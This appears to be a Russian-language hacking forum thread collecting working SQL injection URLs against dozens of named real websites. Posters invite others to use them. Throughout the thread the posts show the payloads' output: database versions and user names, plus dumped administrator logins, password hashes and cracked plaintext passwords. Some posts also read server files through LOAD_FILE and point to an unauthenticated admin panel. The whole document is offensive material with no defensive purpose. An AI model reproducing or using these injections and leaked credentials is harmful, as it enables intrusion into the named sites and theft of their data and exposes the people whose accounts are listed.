SQL Инъекции

www.advancedbariatriccenter.net

Code:

http://www.advancedbariatriccenter.net/news.php?ax=v&n=9&id=9&nid=-3+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5--

version: 4.1.22-standard-log
user: advanced_admin@localhost
database: advanced_cms

 

Code:

http://www.maxauto.ru/index.php?razdel=5&news=-1+union+select+1,concat_ws(0x3a,version( ),databas e(),user()),3,4,5--&page=1

Database Version : 5.0.24a-community-nt
Database name : news
User name : automax@localhost

---------------------------------------------------+

Code:

http://www.maestroauto.com.ua/goods.php?id=-1+union+select+1,2,3,4,concat_w s(0x3a,version (),database(),user()),6,7,8,9,10--

Database Version : 4.1.22-standard
Database name : doktor_automarket
User name : doktor_uzver@localhost

---------------------------------------------------+

Code:

http://www.contractshina.ru/about/index.php?pid=-1+union+select+concat_ ws(0x3a,version(),databas e(),user()),2,3,4--

Database Version : 5.0.45
Database name : contractshinaru
User name : contractshinaru@localhost

юзвери:

Code:

http://www.contractshina.ru/about/index.php?pid=-1+union+select+concat_ws(0x3a,regname ,password),2,3,4+fro m+users--

админка без авторизации :

Code:

http://contractshina.ru/admin

 

Code:

http://www.yurmino.com/index.php?page=lech&id=-4+union+select+concat(user(),0x3a,version(),0x3a,database())--

u_yurmino@localhost:4.1.22:yurmino

PR=4

Code:

http://www.4x4parts.ru/come-up.shtml?id=-4+union+select+1,2,3,4,concat(version(),0x3a,database(),0x3a,user()),6,7,8--

5.0.45-log:4x4parts:4x4parts@localhost

PR=3

Code:

http://www.ralf-art.ru/news.php?id=-4+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7--

ralfart@localhost:4.1.22:ralfart

PR=4

 

Ну вот как обычно небольшой сбор
Налетай

Code:

http://www.apslaquila.it/event.php?id=-1+union+all+select+0,concat_ws(0x3a,version(),user(),database()),2--

версия/юзер/бд:

Code:

5.0.22:apslaquila@localhost:apslaquila

-----------------------------------------------------------------------

Code:

http://www.motortribe.it/news_view.php?ID=-1+union+all+select+0,1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15--

версия/юзер/бд:

Code:

5.0.22:mt_user@lnx6653:I-DEAS_motortribe

--------------------------------------------------------------------

Code:

http://www.alessandrastocchino.it/gallery.php?id=-1+union+all+select+0,concat_ws(0x3a,version(),user(),database())--

версия/юзер/бд:

Code:

log:[email protected]:Sql85634_1

------------------------------------------------------------------

Code:

http://www.gurtenapotheke.ch/product.php?id=-1+union+all+select+concat_ws(0x3a,version(),user(),database()),1--

версия/юзер/бд:

Code:

4.1.25:gurtenap@localhost:gurtenap_data

-------------------------------------------------------------------

Code:

http://www.codexflores.ch/event.php?id=-1+union+all+select+0,1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7--

версия/юзер/бд:

Code:

5.0.45:root@localhost:codexflores

----------------------------------------------------------------------

Code:

http://www.marchanzeiger.ch/newsdetail.php?id=-1+union+all+select+0,1,concat_ws(0x3a,version(),user(),database()),3,4,5--

версия/юзер/бд:

Code:

4.0.24_Debian-10sarge1:marchanzeiger@localhost:marchanzeiger  3

---------------------------------------------------------------------

Code:

http://www.klassiker-garage.ch/show.php?ID=-1+union+all+select+0,concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8--

версия/юзер/бд:

Code:

4.1.22-standard:web373@localhost:usr_web373_1

-------------------------------------------------------------------

Code:

http://www.spitalzollikerberg.ch/download.php?id=-1+union+all+select+0,1,2,3,4,concat_ws(0x3a,version(),user(),database())--

версия/юзер/бд:

Code:

5.0.32-Debian_7etch8:root@localhost:cms24

---------------------------------------------------------------------

Code:

http://www.palatina.ch/gallery.php?id=-1+union+all+select+0,concat_ws(0x3a,version(),user(),database()),2,3--

версия/юзер/бд:

Code:

4.1.18-standard:dabumpimpa_pa@localhost:dabumpimpa_palatina  

------------------------------------------------------------------

Code:

http://www.theofficepub.at/event.php?id=-1+union+all+select+0,1,concat_ws(0x3a,version(),user(),database()),3,4,5--

версия/юзер/бд:

Code:

5.0.77-1-log:jist@localhost:jistTheOfficePub

---------------------------------------------------------------------
The End!

 

http://www.mebor.eu/main.php?ids=-148+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,concat_ws(0x3a,version(),database(),user()),35,36/*&t=0&lang=11



Database Version: 4.1.22-standard
Database name: meboreu_new
User name: meboreu_new@localhost

 

Code:

http://www.bjshijirongtian.com.cn/fen.php?id=-133+union+select+1,2,version(),4,5,6,7/*

5.0.41-community-nt

 

Code:

http://www.caraudiocenter.ru/catalog_f.php?m=coral&id=-1+union+select+1,2,3,concat _ws(0x3a,version(),database(),user()),5,6,7,8,9,10--

Database Version : 5.0.32-Debian_7etch6-log
Database name : z34747_aam
User name : [email protected]

юзвери:

Code:

http://www.caraudiocenter.ru/catalog_f.php?m=coral&id=-1+union+select+1,2,3,concat_ ws(0x3a,email,password ),5,6,7,8,9,10+from+sa_users+limit+1,1--

вход по мылу

 

Наткнулся на интересную скулю, вот:

Code:

http://www.crysys.hu/showabstract.php?id=-118+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,version(),version(),28,29--

Интересна тем, что при запросе

Code:

http://www.crysys.hu/showabstract.php?id=-118+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--

Она не выводит на экран поля, пришлось их угадывать.....кто знает, что это - напишите плиз в ЛС или icq - 95199999

 

Code:

http://www.sehensw.hirnstetten.de/sw.php?id=-8+union+select+1,version()/*

5.0.45-Debian_1ubuntu3.4-log

 

Code:

http://www.accnn.ru/index.php?id_page=-1+union+select+1,2,3,concat_ ws(0x3a,version(),database(),user()),5,6,7,8,9--

Database Version : 4.0.27-max-log
Database name : accnn99_acms
User name : [email protected]

-----------------------------------------------------+

Code:

http://rezina.com.ua/news/?news_id=-826+union+select+1,concat _ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10--&q=0

Database Version : 5.0.45-log
Database name : rezina
User name : rezina@localhost

 

http://ictnieuws.educos.nl/detail.php?ID=-1+union+all+select+0,1,group_concat(0x3a,user_id,0x3a,username,0x3a,userpass),3+from+educos.poll_user--
Louis:3ca70a4c295483a97698770bc683b11d ------>eiken

 

http://www.pap.ro/detaliu.php?id=-117+UNION+SELECT+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11



Database Version: 4.1.22-standard
Database name: pap_pap
User name: pap_pap@localhost

 

http://www.booknow.biz/display.php?id=20766+union+select+1,2,3,concat(a_name,0x3a,a_passwd),5+from+admins/*

есть users

ичо 1 biz )

 

Pagerank: 6
тИЦ: 650

Code:

http://www.kond.ru/news.php?newsid=-1+union+select+1,2,conca t_ws(0x3a,v ersion(),database(),user()),4--

Database Version : 5.0.27-log
Database name : wwwkondru
User name : akseon@localhost

----------------------------------------------------------------+

Pagerank: 5
тИЦ: 750

Code:

http://www.ukrmebel.com/ShopNews.php?NewsId=-1+union+select+1,2,aes_decrypt(aes_encrypt(concat_ws(0x3a,ve rsion( ),database(),user()),0x71),0x71),4,5,6--

Database Version : 5.0.16
Database name : mebel
User name : mebel@localhost

----------------------------------------------------------------+

Pagerank: 5
тИЦ: 600

Code:

http://www.matress.ru/prod1.php?pID=-1+union+select+1,2,3,concat_ ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32, 33--&proizv=290&vID=70

Database Version : 5.0.67-log
Database name : u12715
User name : [email protected]

 

http://www.networkpower.exide.com/products/range_select.asp?range=S300&sub_id=-7+or+1=@@version--&cl=np_apps&lng=en



Version : Microsoft SQL Server 2005 - 9.00.3054.00 (X64) Mar 23 2007 18:41:50 Copyright (c) 1988-2005 Microsoft Corporation Developer Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2

http://www.networkpower.exide.com/products/range_select.asp?range=S300&sub_id=-7+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(SELECT+ALL+TOP+x+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES))--&cl=np_apps&lng=en

x=1....127

 

www.ebenformayor.com

Code:

http://www.ebenformayor.com/news.php?ax=v&n=23&id=6&nid=-3+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5--

version: 5.0.45-log
user: [email protected]
database: ebenform_cms

 

Code:

http://www.mona-liza.com

PR: 3
Тиц: 50
Версия: 4.0.27-log
База данных: mona-liza
Юзверь: [email protected]

Code:

http://www.mona-liza.com/act.php?id=-1%20union%20select%201,2,3,4,5--

Сай монны лизы =))

 

www.esd.lv PR-5

PHP:

http://www.esd.lv/inner.php?left=490&left2=491+union+select+1,2,3,4,5,concat_ws(0x3A,user(),user,password,host,file_priv),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+mysql.user--+


root@localhost:root:*95C79488BBFA161B765760B9654AAA544D1ABB1C:localhost:Y

сервак судя по путям на wamp - C:\wamp\www\index.php

PHP:

http://www.esd.lv/inner.php?left=490&left2=491+union+select+1,2,3,4,5,LOAD_FILE(0x433a5c77616d705c7777775c61646d696e5c696e6465782e706870),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+


PHP:

http://www.esd.lv/inner.php?left=490&left2=491+union+select+1,2,3,4,5,concat_ws(0x3A,login,parole),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+esd.lietotaji+where+admin=1--+


admin:gruutaa_1981
http://www.esd.lv/admin/

elt.pearsoned.it Pr-5

PHP:

http://elt.pearsoned.it/schedaopera/scheda_opera.php?ID=-1+union+select+1,unhex(hex(concat_ws(0x3a,user(),@@version,database()))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34--+


user:root@localhost
version: 4.1.15-standard
db:catalogo

PHP:

http://elt.pearsoned.it/schedaopera/scheda_opera.php?ID=-1+union+select+1,unhex(hex(LOAD_FILE(0x2f686f6d65322f7765622f656c742f5f617574682e706870))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34--+


root:augusto

 

http://www.honda-bikes.ro/interior.php?cat=4&id=-103+UNION+SELECT+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26

Database Version: 4.1.22-standard-log
Database name: hondab_honda
User name: hondab_fix@localhost


http://www.honda-bikes.ro/interior.php?cat=4&id=-103+UNION+SELECT+1,2,3,4,5,6,CONCAT_WS(0x3a,user_email,user_id,user_password,username),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+FROM+phpbb_users+LIMIT+1,1

[email protected]:2:f6fdffe48c908deb0f4c3bd36c032e72:admin


f6fdffe48c908deb0f4c3bd36c032e72=adminadmin

 

Code:

http://www.dddb.net/php/latestnews_Linked.php?id=-526+union+select+AES_DECRYPT(AES_ENCRYPT(version(),1),1),2,3,4/*

4.1.14-Debian_5-log

http://search.msn.com/results.aspx?q=IP%3A208.113.142.65&FORM=MSNH
неплохо..
раскрытие путей:

Code:

/home/.dalai/dddb/dddb.net/php